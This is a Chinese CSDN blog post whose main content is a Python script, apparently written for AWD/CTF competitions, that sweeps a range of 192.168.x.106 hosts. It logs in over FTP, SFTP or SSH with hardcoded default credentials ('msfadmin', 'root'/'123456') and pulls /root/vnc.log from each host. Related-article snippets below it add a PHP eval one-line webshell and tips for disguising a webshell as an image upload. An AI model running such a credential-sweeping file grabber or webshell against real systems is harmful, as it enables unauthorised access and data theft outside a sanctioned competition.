自动获取flag

最新推荐文章于 2023-12-27 21:54:32 发布
最新推荐文章于 2023-12-27 21:54:32 发布
阅读量3k 收藏 6
点赞数 1
文章标签: Python paramiko ssh flag
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zheng_ruiguo/article/details/88603806
版权 
'''
scnaFlag.py 自动获取flag by 郑瑞国
'''
import paramiko
import webbrowser
from ftplib import FTP
import threading
import time

def webConnect(ip):
    webbrowser.open('http://'+ip+'/twiki/readme.txt')
    time.sleep(0.5)

def ftpConnect(ip,user,pwd):
    try:
        ftp = FTP()
        #ftp.set_debuglevel(2)
        ftp.connect(ip,21,6)
        ftp.login(user,pwd)
        ftp.cwd('/root')
        ftp.retrbinary('RETR '+'vnc.log',open('flagvalue'+ip+'.txt','wb').write)
        ftp.quit()
        print(ip,'ftp get flag OK',user)
        flag = open('flagvalue'+ip+'.txt','rb').readlines()
        for line in flag:
            print(line.decode())
    except:
        print(ip,'ftp no connect',user)

def ftpConnect2(ip,user,pwd):
    try:
        transport = paramiko.Transport((ip, 22))
        transport.connect(username=user,password=pwd)
        sftp = paramiko.SFTPClient.from_transport(transport)
        # 将remove_path 下载到本地 local_path
        sftp.get('/root/vnc.log', 'flagvalue'+ip+'.txt')
        print(ip,'ftp get flag OK',user)
        # 将location.py 上传至服务器 /tmp/test.py
        #sftp.put('flagvalueV.txt', '/root/flagvalue.txt')
        #print(ip,'ftp put flag OK',user)
        transport.close()
        return 1
    except:
        print(ip,'ftp no connect',user)

def sshConnect(ip,user,pwd):
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect(hostname=ip,port=22,username=user,password=pwd,timeout=1)
        flag = ssh.exec_command('cat /root/vnc.log')[1].readlines()
        print(ip,'flag:')
        for line in flag:
            print(line)
        ssh.close()
        return 1
    except:
        print(ip,'ssh no connect',user)


def scanAll(firstNet,endNet,user1,pass1,user2,pass2):
    for net in range(firstNet,endNet):
        ip = '192.168.'+str(net)+'.106'
        #print(ip)
        threading._start_new_thread(webConnect,(ip,))
        #time.sleep(1)
        #threading._start_new_thread(sshConnect,(ip,user1,pass1))
        #time.sleep(1)
        threading._start_new_thread(ftpConnect,(ip,user1,pass1))
        time.sleep(1)
        #threading._start_new_thread(sshConnect,(ip,user2,pass2))
        #time.sleep(1)
        threading._start_new_thread(ftpConnect,(ip,user2,pass2))
        time.sleep(1)

if __name__=='__main__':
    #scanAll(firstNet,endNet,user1,pass1,user2,pass2)
    scanAll(0,9,'msfadmin','msfadmin','root','123456')

 

云空
关注
AWD自动提交flag脚本
05-14
在AWD赛事中,参赛者通常需要防护一个网络应用或服务,同时尝试攻击对手的系统来获取他们的flag。编写这样的脚本通常涉及以下关键知识点: 1. **Python编程**:由于Python的易读性、丰富的库支持和广泛应用于自动化...
命令执行总结
Airwooh的博客
07-21 797
命令执行总结 刚把CTFSHOW的命令执行部分给做完,但脑子里还是混沌一片,想来总结一下这部分,把知识点给凝聚一下,有一个清晰的脉络 首先一个要搞懂一个概念,命令执行是要执行的什么命令? 我认为大致分为两种:php命令和shell命令,一般只执行一种 php代码执行 首先提到一个函数 eval 通过其与$_GET[a] 配合 可以去执行命令 <?php $a=$_GET['a']; eval($a); 翻看php手册 可以看到 官方说明 把字符串 code 作为PHP代码执行。
l33t-hoster 后续读取flag操作(记一次裁缝过程)
Uchiha_duan的博客
07-13 249
(好久不做题了,知识点都忘了,真不该(つ﹏⊂))首先声明,我是在buu的环境里做的。
perl脚本GET系统命令执行
paidx0
10-22 908
题目来自 [HITCON 2017]SSRFme 代码的思路很简单,就是会先建一个文件夹sandbox/md5(orange+ip),然后将url的值写到filename文件中 $data = shell_exec("GET " . escapeshellarg($_GET["url"])); 这行代码开始以为就是GET请求,所以想到了file协议去读文件,但这种做法是错误的 简单记录一下perl脚本GET系统命令执行的学习 简单来看看使用GET如何来执行系统命令。具体为啥原因我也说不上来,大概
Go 实战 | 让你的 flag 支持从文件中读取命令行参数
Go中国
12-08 853
大家好,我是 Go 学堂的渔夫子。今天给大家介绍一个在项目中如何将命令行参数组织到文件中并进行解析的案例。golang标准库提供了flag包来处理命令行参数。常规的使用都是在命令行中启动服...
txt文件读取(已解决中文乱码)
msk498020309的博客
07-31 9541
昨天读取txt文档的时候始终出现中文乱码,去好多网站看了,都TMD一坑,根本没有解决问题嘛!大多数博客上写的的格式就是一样的不晓得哪个超哪个,最后终于在http://blog.csdn.net/maxracer/article/details/5436580上找到解决办法,进行一些改进后,得到可行的方法 1.Read.java [code="java"] import java.io.B...
自动提交flag到指定服务器python脚本
05-12
自动从txt读取flag并提交指定平台python脚本,AWD比赛专用,可以自定义内容,批量提交等,确保速度
awd比赛可用的自动获取flag脚本。.zip
09-30
awd比赛可用的自动获取flag脚本。
CTF-入门二
realstarstarli的博客
04-05 852
CTF-入门二 因为上周学习了关于CTF杂项的部分内容,所以在这里做一些归纳总结: 主要包含,关于解决杂项的题目时要使用到的一些工具和bugkuctf 杂项的前12题。 1.杂项介绍以及使用工具(部分) 杂项是CTF题型中一种,杂项顾名思义,便是“杂”,内容涵盖的范围十分的广泛,题目难度有时候会很简单,有时会比较难,大多数情况下会比较简单,是入门题型的好选择。杂项正因为““杂””所以在解题的过程中...
C语言在读取txt类型文件中的汉字字符串出现乱码的解决办法
立志冲海大
08-11 1万+
题目 C语言在读取txt类型文件中的汉字字符串出现乱码的解决办法 以下是本篇文章正文内容,欢迎朋友们进行指正,一起探讨,共同进步。——来自考研路上的lwj 一、前言 当我们在练习文件这一章节时,因为需要从文件中读取数据,有很多数据是中文形式的,当我们在读取的时候,发现这些中文从文件里读出来然后输出就变成了乱码,如下所示,是我今天练习一道编程题时输出的乱码,我花了一个小时找错误后发现代码和格式并没有任何的错误,那么究竟是哪里出问题了呢? 二、解决办法 1.问题的主要原因是我们每个人的电脑编码方式不同
AWD攻防中读取flag的批量脚本
09-05
AWD攻防中读取flag的批量脚本,可能需要自行修改下
文件包含漏洞_练习
weixin_51583379的博客
09-22 1644
发现源代码里面有一句话木马我们可以复制,地址到中国蚂🗡,然后把cmd填上发现连接成功。
3种方法解决txt文档乱码
热门推荐
minitool_meow的博客
08-29 12万+
通过控制面板 大多数情况下TXT中文乱码是由于切换系统语言造成的,我们在控制面板里把语言切换回中文即可。 第一步:点击桌面上的控制面板,选择“时钟和区域”。 第二步:打开“区域”。 第三步:在“管理”中找到“更改系统区域设置”。 第四步:当前区域设置成中国简体中文,点击“确定”,然后重启电脑,即可恢复。 通过txt文本导航 第一步:打开乱码的txt文档,在导航栏中选中“格式”。 第二步:点击“字体”,在“脚本”中,将“西欧语言”改为“中...
文件上传(antsword获取flag
m0_62886641的博客
05-02 678
copy /b 图片名.png+一句话木马.php 生成新文件名.png。非法用户可以利用上传的恶意文件控制整个网站,这个恶意文件被称为。.htaccess不允许上传,图片马可以上传,但是还不能运行。、.php3、.php4、.php5、.pHp(修改大小写)出现乱码则使用antsword 去连接,找出flag。用burpsuite里面的浏览器。若以上后最后被限制,可以试试。,也可以称为一种网页后门。文件名,内容类型,内容。把获取的文件重新上传。
网络渗透CTF实践:获取靶机Web Developer 文件/root/flag.txt中flag
最新发布
yellowO的博客
12-27 4835
实验目的:通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。(Dirb 是一个专门用于爆破目录的工具,在 Kali 中默认已经安装,类似工具还有国外的patator,dirsearch,DirBuster, 国内的御剑)截图。利用该插件可能存在的漏洞。pwd查看当前所在的目录,cd切换到/var/www/html目录下,ls查看当前目录下的内容,找到wp-config.php文件。
CTF比赛中使用Python通过Mysql漏洞获取FLAG
单核CPU的小朋友的博客
03-21 1298
#!/usr/bin/env python import MySQLdb def Mysql_Inject(ip,flag): db = MySQLdb.connect("127.0.0.1","root","123456","python") cursor = db.cursor() try: query = "insert into py values(\"%s\",\"%s\");"%(ip,flag) cursor.execute(query
博客flag日志
二货磁铁
07-03 381
就是立个flag
工具方法——根据flag获取对应的值
2551的博客
07-20 2749
根据flag获取对应的值 有时候我们在做数据存储的时候,会需要根据一个flag,然后转换为对应的中文存到数据库中,例如: String flag = "1,2,4"; String str = "1小轿车;2大卡车;3大巴车;4摩托车;5坦克;6皮卡车"; flag是我们后台接收到的值,数据库中需要存的是对应的中文。使用以下方法,就可以很方便地进行转化。 public String convert(String str, String flag) { // 0新保;1续保;2转保;3电销;
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值